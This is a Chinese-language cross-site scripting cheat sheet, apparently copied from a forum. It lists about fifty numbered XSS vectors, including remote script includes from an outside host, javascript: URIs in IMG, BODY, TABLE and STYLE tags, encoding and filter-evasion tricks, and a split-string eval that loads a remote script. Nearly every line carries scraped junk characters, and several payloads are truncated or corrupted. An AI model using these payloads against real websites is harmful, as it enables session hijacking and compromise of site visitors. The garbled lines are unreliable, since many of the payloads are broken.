(1)普通的XSS JavaScript注入 B! g' r* j) J! c% \' F
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 [6 t& j5 W% D
(99)另类弹框
( v' m* D+ Y& n' ?<q/oncut=alert()>1$ p* r/ \0 s. \& B
<s/onclick=alert()>b* } ~% H. |1 `
<XSS=" onclick="alert(1)//">clickme</SSX=">
/ `+ v' u% u+ A+ B% g7 Z <zzz onclick=alert`1`>clickme</zzz> 3 d7 Z8 q" ]5 y
<a onclick=alert`1`>clickme</a>+ Z% R- d- l; g' {: o
<a=">clickme</a=">
$ i- X( [" g$ B% c<a=">clickme</a>8 b( U P( D0 |' ^* v2 G
<z=">clickme</z="># J4 D9 a6 p$ `
<z onclick=alert`1`>clickme</z>
' h5 d# n, n2 U: ~9 k4 [+ `; u& n( C7 }2 v) l$ Z
(2)IMG标签XSS使用JavaScript命令 R; b+ \0 F7 K" N: T8 {
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: J+ o+ g3 e- x7 I( S$ W9 a& `: g) P2 S/ J$ B* K+ Y
(3)IMG标签无分号无引号' d% F9 a2 V# |3 H( |% z
<IMG SRC=javascript:alert(‘XSS’)># {$ q! A7 s/ j2 b
8 k3 S9 q2 G$ \) c/ f4 ~(4)IMG标签大小写不敏感+ z9 w5 n, G% A% X1 ]$ V0 u8 @, J2 J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>9 l |* L6 `, S6 u+ U' O$ s
+ L5 N; h# ~0 I# H) P9 S+ X% ]
(5)HTML编码(必须有分号)
! `3 W _6 O+ y! B$ P1 ~<IMG SRC=javascript:alert(“XSS”)>
) l3 Y2 ?6 I& O" o1 L5 u( Z6 B; S1 ]$ {3 i' z
(6)修正缺陷IMG标签' W [6 I) U$ H$ j9 \: c% m
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ b9 n+ D1 |2 B4 o! u/ T+ E) s. x" C7 w6 [) S7 q6 T
(7)formCharCode标签(计算器)8 }, L6 X: w/ I0 W) k2 o' k. Z
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( H% J8 R0 D- t7 x. V- h
' K/ Q4 y; s I/ c2 I; m& d# C$ |" w(8)UTF-8的Unicode编码(计算器)
" w. Q* L" {# i3 o* }' U! K/ B' `<IMG SRC=jav..省略..S')>+ j$ c4 [& k& g9 @" A0 `$ `
$ Z6 H2 r$ c) }$ z# z4 A2 {# J
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
" e8 p. E" J- ]<IMG SRC=jav..省略..S')>
0 ~4 q# ~ m' M
( D! I! V$ ?3 M7 |0 t(10)十六进制编码也是没有分号(计算器)
" N- `/ a; s% X; ^. K3 W<IMG SRC=\'#\'" /span>
2 M$ ~4 M* y7 H+ {# }2 f
1 X# y. o" Z! x(11)嵌入式标签,将Javascript分开
; Q/ M- X; v' ^$ D3 h) `4 _<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 d$ ^5 W* n/ v' h# f' t: c3 s, K
(12)嵌入式编码标签,将Javascript分开
( L& f* r: |# c) C$ L+ T<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
0 j1 z/ K$ |# E' m \
, ?# ~. H6 }( j& x" j(13)嵌入式换行符9 y( x; q% @6 L3 D
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>* b. ?9 e( F2 h: ]; n# ~ F
9 v3 i3 [2 C( i+ l5 ~# p1 x(14)嵌入式回车% j5 Z0 Q3 m. U% q P9 O
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”> }* j, i8 t* D8 F1 R6 N- t8 M
+ P9 X1 l8 X7 Z; h. d
(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ P: W- y6 e* d0 G# [# X1 a- N
<IMG SRC=\'#\'" /span>
4 ^/ z! S* g/ k3 p$ n$ P9 Y* r8 B" c. R; u l; U- R6 h% a8 s
(16)解决限制字符(要求同页面)
6 Z8 {, y! B# W2 C9 V2 C( p<script>z=’document.’</script>
1 R% _0 `7 Y$ \2 z! h8 c! i% _ a<script>z=z+’write(“‘</script>
- b9 ?0 ~# o" S9 S, d<script>z=z+’<script’</script>
1 ?8 i/ b1 w3 P& l: w' M<script>z=z+’ src=ht’</script>
! B( k1 i7 g/ y<script>z=z+’tp://ww’</script>2 c8 {( H& ]2 N, a9 k+ J8 a
<script>z=z+’w.shell’</script>+ A5 z4 _. `* H" b8 P( i
<script>z=z+’.net/1.’</script>
) T# K: _% k& L4 x% C4 A8 h<script>z=z+’js></sc’</script>
3 Y' Z- }! C/ E, ?/ `<script>z=z+’ript>”)’</script>
4 k, h4 J3 ~; X<script>eval_r(z)</script>
8 O, q$ l9 J" r. ^5 h1 `
! U' m4 R1 l/ @9 \; g1 R(17)空字符( y8 T$ x$ ^6 m/ r- E8 {( Z/ {
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 D& S1 O' [- z1 \& Q/ `# y& ?; J; ?
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
. J6 ^( E9 |1 X7 T6 @5 |% Bperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 t2 R, H7 \8 Z* E6 A; c. k
/ {9 z; Y) u/ r6 L- Q(19)Spaces和meta前的IMG标签
* d) Q* w9 n& D# |% o<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
, q* ]" Q3 N0 y0 ^
5 B$ ~/ C0 D8 w0 {4 C(20)Non-alpha-non-digit XSS
" R/ [0 R1 o/ b: A5 V3 N, d<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
$ H# W0 G$ m# p/ |" Y; ?- f& ~9 X. ^! K9 H2 ^. N! t) N" \
(21)Non-alpha-non-digit XSS to 2" s+ B- y+ b7 K7 V% ~4 E+ l
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 p; P, M# L- M) Q
: h% s8 z# e5 ~8 T(22)Non-alpha-non-digit XSS to 3% L! M, q2 L/ o) E
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>% x0 [1 ]7 V8 C
6 x5 E. W$ e6 O% T. u/ J
(23)双开括号
# P% x" m" Q" o5 @; E) b<<SCRIPT>alert(“XSS”);//<</SCRIPT>/ b# a+ O$ y# K
7 C0 _- V. d+ v% P6 J6 V(24)无结束脚本标记(仅火狐等浏览器)1 z. W5 b; I9 U, o$ u2 s) j* ]
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>1 ?* Z4 ^+ |$ W" ~9 t* k" j( t
5 J0 d& m/ q/ s+ V) I/ q
(25)无结束脚本标记2
9 T: L# T1 ~, J<SCRIPT SRC=//3w.org/XSS/xss.js>/ q7 |" m1 e5 j+ P& A
+ I3 }0 r1 Q3 G( P9 [
(26)半开的HTML/JavaScript XSS2 t, q6 B" d+ ~7 W& T; Q) Z
<IMG SRC=\'#\'" /span>
% i& q9 \4 x5 p+ _6 n' L+ h3 s' V; I; ^' a
(27)双开角括号
- `4 o8 c- {) q0 @6 M<iframe src=http://3w.org/XSS.html <4 m' |) d ]- a4 m- M; H6 ]
1 z/ w, |9 K5 q6 S% v* [(28)无单引号 双引号 分号
4 h# Z( X. A$ K3 G: T$ H' F1 S<SCRIPT>a=/XSS/' k4 \9 H; @# S, M2 w3 k" D% Z
alert(a.source)</SCRIPT>
0 T5 \/ z- N* e' w* H2 W9 x% s( ~. u
(29)换码过滤的JavaScript: F7 t5 H2 s$ y5 C8 x
\”;alert(‘XSS’);//9 x0 j( |# k: ]
+ i3 V; r% i: s" M7 f9 |5 b
(30)结束Title标签6 G, q$ u! I+ O& Q& t* @# D
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: d9 Y) M7 K% e( b4 c5 F' S+ a& J# t7 X) `7 R- H0 c
(31)Input Image# i9 E4 Q1 F; r- D! N
<INPUT SRC=\'#\'" /span>
* _/ o: F- B0 F1 F
: v7 |( s/ G: ]8 u# I2 o% E(32)BODY Image
+ s8 ^( u% Y( {5 M7 R O: g! Q: S<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
9 x) \/ n$ }; |1 P- i5 ]0 Y9 ~9 {" a9 _, G! w
(33)BODY标签1 D5 r3 n# L7 W3 e. E1 Q
<BODY(‘XSS’)>
. m( X. A8 t$ T Y$ T
; { c- k: `$ ~. d(34)IMG Dynsrc
7 b( A- r6 z" ~- ~) |7 Y$ j<IMG DYNSRC=\'#\'" /span>: V! V# a$ f% \8 Z2 [- ?( q
$ c9 A1 e7 s, p- H
(35)IMG Lowsrc
+ Q& _3 W* S% @& Y7 P<IMG LOWSRC=\'#\'" /span>1 Z; X2 \- ?' |- U" o
6 W, ~( L& H( Q0 A& X(36)BGSOUND
# g* y+ W: E0 C5 |9 Y0 r<BGSOUND SRC=\'#\'" /span>) g+ d/ X( U/ d. C; m+ ^1 t3 P
6 ^+ _5 Q% t' M' n. Y+ F6 z+ @( S R
(37)STYLE sheet
; k& ^8 S* i. D6 O$ F1 U$ U9 ~<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- c0 h, }/ I+ M. y& F$ w" `4 O2 D! r! p3 g( P0 ]
(38)远程样式表
1 Z/ S* E' \7 B. n) ?! w<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
$ b! `7 K$ ]% o7 Y' y4 J) y# |. H
(39)List-style-image(列表式)
$ E+ F" C0 A6 D' s5 t: W1 S I<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS2 F) T; y( Z1 F8 ]" O5 @
' y4 Z& p: O" Y2 ^ d(40)IMG VBscript
2 q w D) h4 x<IMG SRC=\'#\'" /STYLE><UL><LI>XSS0 Q3 f; B' }( @2 X2 x9 T( _; c
3 Q) D+ W* B7 H! ?(41)META链接url
( r9 Q3 E) A8 X8 x2 x: E2 K<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. D# F5 L$ O4 h0 G- I
; P9 J9 |( e# ], t5 E# |# i(42)Iframe
& R. l7 g5 ] D0 O4 q. c2 I+ B<IFRAME SRC=\'#\'" /IFRAME>
/ K" D, |+ M* W0 p
" Z' r* C0 q. b7 \(43)Frame
% b' |0 }7 [# V! n6 s<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
* @5 s7 m5 ^; g2 }4 @) y& \! V/ M7 B
(44)Table: g; J G2 z$ ]
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
# P( o" M4 G' {4 _( F1 w2 J
' o: p. H V0 u3 @% n6 `3 U0 U(45)TD
4 G6 D; i' k* k9 v" z<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>' ~0 p# c. _% G/ m( z) B- b
. R! M! a; R, m p(46)DIV background-image) v( i* s T8 p2 v3 ~: o; n: Z
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>* q, X% k* E: a% K8 R# T# e: }
$ x8 S3 S: V) g2 e. i7 r" A* v
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
' P* i( y1 Q& Y+ C7 ~<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ ?% @' p8 K I
* n" F3 Q+ v4 R
(48)DIV expression
2 m( H2 \, K6 o<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 ^- J) M& _: Y6 v& Y, Y1 m
9 P N. {" w8 S' ]. H* t(49)STYLE属性分拆表达; X; N! l% g+ f- k/ r' b, {) Z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
& y4 F& \$ v, ]( |5 |( n% p! H' _
0 p7 x" y; M4 j B: ~# u2 r(50)匿名STYLE(组成:开角号和一个字母开头)
- Q7 f+ i& R8 s! f$ \& F<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 {- t% i' z% X! J5 o# Q7 C9 i
: `) I- H. |6 y1 T) v(51)STYLE background-image4 y9 A' p1 k. a
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
9 z U4 A$ |: T& o3 D
) F0 Y0 {) \. ~7 _# r5 `& O0 {. w(52)IMG STYLE方式7 D. y0 d$ c r, s8 u
exppression(alert(“XSS”))’>! n$ H9 ?. q! d+ X9 Z1 ]! w$ S
& y6 G& R! i9 ^% c
(53)STYLE background9 _$ G1 |: f# e; |( p6 [8 i$ e
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>) P. J* C# `( x1 P/ W. @2 x
- R6 _, r9 j) Q% p2 P1 h(54)BASE* w$ k$ l) `' j' K( }
<BASE HREF=”javascript:alert(‘XSS’);//”>/ o3 Z, A) b) i' u0 G! ` J M
6 K3 D5 C8 W% y# A4 W, q
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS$ Z+ x0 d( ]$ ~
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
4 [! a8 U" n$ G1 }, F3 _3 A( Y& p: J |